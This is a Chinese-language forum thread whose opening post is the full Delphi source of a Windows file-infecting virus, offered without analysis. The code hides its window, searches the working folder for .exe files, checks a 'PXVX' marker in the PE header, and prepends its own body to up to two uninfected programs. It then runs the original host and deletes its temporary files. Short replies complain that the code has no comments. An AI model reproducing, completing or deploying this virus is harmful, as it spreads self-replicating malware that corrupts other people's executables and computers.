作者: Winmillion [winmillion] 论坛用户 | 登录 |
program XX; {$APPTYPE CONSOLE} uses SysUtils,Windows,ShellApi,TlHelp32; //-----------------------DETERMINE PROCESS EXISTANCE----------------------------- function process_exists(exeFileName: string): Boolean; var ContinueLoop: BOOL; FSnapshotHandle: THandle; FProcessEntry32: TProcessEntry32; begin FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); FProcessEntry32.dwSize := SizeOf(FProcessEntry32); ContinueLoop := Process32First(FSnapshotHandle, FProcessEntry32); Result := False; while Integer(ContinueLoop) <> 0 do begin if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) = UpperCase(ExeFileName)) or (UpperCase(FProcessEntry32.szExeFile) = UpperCase(ExeFileName))) then begin Result := True; end; ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32); end; CloseHandle(FSnapshotHandle); end; //-----------------------CHECK FILE FOR INFECTION------------------------ function check_infected(hndl:string;size:longint):boolean; var i,PE_Header:longint; hndl2,NBR:dword; buf:array[1..2] of char; sign:array[1..4] of char; begin hndl2:=CreateFile(pchar(hndl),GENERIC_READ,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); i:=0; PE_Header:=0; repeat i:=i+1; ReadFile(hndl2,buf,SizeOf(buf),NBR,0); if buf='PE' then PE_Header:=i; until (i=size) or (PE_Header<>0); SetFilePointer(hndl2,PE_Header+$4C,0,FILE_BEGIN); ReadFile(hndl2,sign,SizeOf(sign),NBR,0); if sign='PXVX' then check_infected:=TRUE else check_infected:=FALSE; CloseHandle(hndl2); end; //--------------------WRITE VIRUS SIGN---------------------------------------------- procedure write_sign(hndl:string;size:longint); var i,PE_Header:longint; hndl2,NBR:dword; buf:array[1..2] of char; sign:array[1..4] of char; begin sign[1]:='P'; sign[2]:='X'; sign[3]:='V'; sign[4]:='X'; i:=0; PE_Header:=0; hndl2:=CreateFile(pchar(hndl),GENERIC_READ,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); repeat i:=i+1; ReadFile(hndl2,buf,SizeOf(buf),NBR,0); if 
buf='PE' then PE_Header:=i; until (i=size) or (PE_HEADER<>0); CloseHandle(hndl2); hndl2:=CreateFile(pchar(hndl),GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); SetFilePointer(hndl2,PE_Header+$4C,0,FILE_BEGIN); WriteFile(hndl2,sign,SizeOf(sign),NBR,0); CloseHandle(hndl2); end; //--------------------EXECUTE HOST FILE----------------------------------------- procedure exec_host(hndl:string); begin ShellExecute(0,'open',pchar(hndl),nil,nil,SW_SHOWNORMAL); repeat sleep(1000); until process_exists(hndl)=FALSE; end; //---------------------LOAD VIRUS--------------------------------------------- procedure load_virus(hndl:string;virus_size:longint); var buf:char; i:integer; vir_hndl,tmp_hndl,NBR:dword; begin tmp_hndl:=CreateFile(pchar('virus.dat'),GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0); vir_hndl:=CreateFile(pchar(hndl),GENERIC_READ,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); for i:=1 to virus_size do begin ReadFile(vir_hndl,buf,SizeOf(buf),NBR,0); WriteFile(tmp_hndl,buf,SizeOf(buf),NBR,0); end; CloseHandle(vir_hndl); CloseHandle(tmp_hndl); end; //---------------------LOAD HOST---------------------------------------------- procedure load_host(hndl:string;virus_size,host_size:longint); var i:integer; buf:char; vir_hndl,tmp_hndl,NBR:dword; begin tmp_hndl:=CreateFile(pchar('host.exe'),GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0); vir_hndl:=CreateFile(pchar(hndl),GENERIC_READ,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); SetFilePointer(vir_hndl,virus_size,0,FILE_BEGIN); for i:=1 to host_size do begin ReadFile(vir_hndl,buf,SizeOf(buf),NBR,0); WriteFile(tmp_hndl,buf,SizeOf(buf),NBR,0); end; CloseHandle(vir_hndl); CloseHandle(tmp_hndl); end; //--------------------------PREPEND--------------------------------------------- procedure 
prepend(victim,virus:string;virus_size,victim_size:longint); var buf:char; i:integer; vir_hndl,vic_hndl,NBR,target_hndl:dword; begin vir_hndl:=CreateFile(pchar(virus),GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); target_hndl:=CreateFile(pchar(victim),GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); vic_hndl:=CreateFile(pchar('victim.dat'),GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0); for i:=1 to victim_size do begin ReadFile(target_hndl,buf,SizeOf(buf),NBR,0); WriteFile(vic_hndl,buf,SizeOf(buf),NBR,0); end; CloseHandle(vic_hndl); CloseHandle(target_hndl); target_hndl:=CreateFile(pchar(victim),GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); vic_hndl:=CreateFile(pchar('victim.dat'),GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); for i:=1 to virus_size do begin ReadFile(vir_hndl,buf,SizeOf(buf),NBR,0); WriteFile(target_hndl,buf,SizeOf(buf),NBR,0); end; CloseHandle(vir_hndl); for i:=1 to victim_size do begin ReadFile(vic_hndl,buf,SizeOf(buf),NBR,0); WriteFile(target_hndl,buf,SizeOf(buf),NBR,0); end; CloseHandle(vic_hndl); SetEndOfFile(target_hndl); CloseHandle(target_hndl); end; //------------------------DELETE TMP FILES-------------------------------- procedure delete_junk; begin DeleteFile(pchar('host.exe')); DeleteFile(pchar('virus.dat')); DeleteFile(pchar('victim.dat')); end; //--------------------------MAIN VIRUS-------------------------------------- const virus_size=44544; var over,exec_flag:boolean; host_size:longint; n:dword; old:string; FileSize:LongWord; target,sr:tsearchrec; Inf_counter:integer; begin ShowWindow(FindWindow(nil,pchar(paramstr(0))),SW_HIDE); Inf_counter:=2; over:=FALSE; n:=FindFirst(paramstr(0),faAnyFile,sr); FileSize:=sr.size; FindClose(n); 
exec_flag:=TRUE; host_size:=FileSize-virus_size; FindFirst('*.exe',faAnyFile,target); if target.name=ExtractFilename(paramstr(0)) then FindNext(target); repeat if (target.name<>ExtractfileName(paramstr(0))) and (check_infected(target.name,target.size)=FALSE) and (target.name<>'host.exe') then begin if virus_size<>FileSize then begin host_size:=FileSize-virus_size; load_virus(paramstr(0),virus_size); if exec_flag=TRUE then begin load_host(paramstr(0),virus_size,host_size); exec_host('host.exe'); end; exec_flag:=FALSE; prepend(target.name,'virus.dat',virus_size,target.size); Inf_counter:=Inf_counter-1; end else begin load_virus(paramstr(0),virus_size); prepend(target.name,'virus.dat',virus_size,target.size); write_sign(target.name,target.size); Inf_counter:=Inf_counter-1; exec_flag:=FALSE; end end; old:=target.name; FindNext(target); if target.name=old then over:=TRUE; until (Inf_counter=0) or (over=TRUE); if (virus_size<>FileSize) and (exec_flag=TRUE) then begin load_host(paramstr(0),virus_size,host_size); exec_host('host.exe'); end; delete_junk; ExitProcess(0); end. |
地主 发表时间: 09-03-24 23:14 |
回复: studentol [studentol] 论坛用户 | 登录 |
虽然是转载的（猜测），为什么不自己加上注释呢？于人于己都有好处的。 |
B1层 发表时间: 09-04-03 02:25 |
回复: Winmillion [winmillion] 论坛用户 | 登录 |
如果能看得懂的人就不需要多加注释了.呵呵!可是在下没有多少时间. |
B2层 发表时间: 09-04-03 21:57 |
回复: studentol [studentol] 论坛用户 | 登录 |
呵呵，我看不懂，我可是菜鸟呀。呵呵，既然忙，那就没必要上传了，呵呵，为你着想呀。 |
B3层 发表时间: 09-04-03 23:27 |